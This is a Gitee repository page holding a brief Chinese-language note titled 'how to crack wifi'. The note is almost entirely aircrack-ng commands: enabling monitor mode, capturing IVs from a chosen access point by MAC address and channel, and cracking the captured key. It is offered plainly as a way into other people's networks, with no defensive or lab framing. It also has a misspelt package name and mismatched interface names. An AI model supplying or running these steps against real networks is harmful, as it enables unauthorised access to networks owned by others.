1 Star 0 Fork 265

xuxinchun/python-learn

forked from mktime/python-learn 
Create your Gitee Account
Explore and code with more than 14 million developers,Free private repositories !:)
Sign up
文件
Clone or Download
crack_wifi.txt 525 Bytes
Copy Edit Raw Blame History
mktime authored 2015-12-25 20:09 +08:00 . how to crack wifi
安装aircrack-ng
yaourt -S aricrack-ng
打开无线网卡监听模式 设无线网卡为wlan0
airmon-ng start wlan0
这时通常会多出一个mon0设备,这个设备就是打开了监听模式的wlan0
察看当前工作所有的无线ap
airodump-ng wlp3s0mon
从破解的ap抓取数据
airodump-ng --ivs -d AP_MAC_地址 -w data
-c 用来制定频道, 频道在ariodump的时候可以看到
airodump-ng --ivs -d AP_MAC_地址 -c number -w data
破解密码
当抓取的数据足够多就用
aircrack-ng data*
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
Python
1
https://gitee.com/xuxinchun/python-learn.git
git@gitee.com:xuxinchun/python-learn.git
xuxinchun
python-learn
python-learn
master

Search